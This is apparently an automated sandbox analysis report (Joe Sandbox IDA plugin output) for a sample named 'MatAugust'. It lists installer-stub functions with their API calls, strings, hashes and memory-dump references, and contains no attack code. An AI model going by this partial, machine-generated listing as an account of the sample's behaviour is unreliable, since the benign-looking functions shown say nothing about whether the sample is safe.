Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00019C00,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

@rD, xrefs: 00404402
%u.%u%s%s, xrefs: 00404444

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

, xrefs: 004048DA
@rD, xrefs: 00404934

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

..., xrefs: 00406293
%02x%c, xrefs: 00406270

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Section: "%s", xrefs: 00405079
Skipping section: "%s", xrefs: 004050B5

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
